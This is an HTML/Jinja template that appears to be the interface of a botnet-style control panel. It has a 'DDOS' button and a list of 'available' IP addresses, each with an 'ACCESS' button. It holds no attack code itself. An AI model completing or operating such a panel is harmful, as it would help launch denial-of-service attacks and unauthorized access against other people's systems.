{% extends "layout.html" %}
{% block title %}Main Activity{% endblock %}
{% block content %}
<table width="100%">
    <tr>
        <td><p class="subtitle">Main activity</p></td>
        <td><form method="post">
        <input class="ddos_btn" type="submit" name="submit" value="DDOS">
        </form></td>
    </tr>
    <tr>
        <td><p class="available">[ AVAILABLE IP ]</p></td>
    </tr>
</table>
<table width="100%">
	{% for ip in ip_list %}
    <tr>
        <td><p class="main_ip"># {{ ip }} \</p></td>
        <td><form method="post">
		    <input class="access_btn" type="submit" name="submit" value='ACCESS'> 
		    <input name="access" type="hidden" value='{{ ip }}'> 
            </form></td>
    </tr>
	{% endfor %}
</table>
{% endblock %}
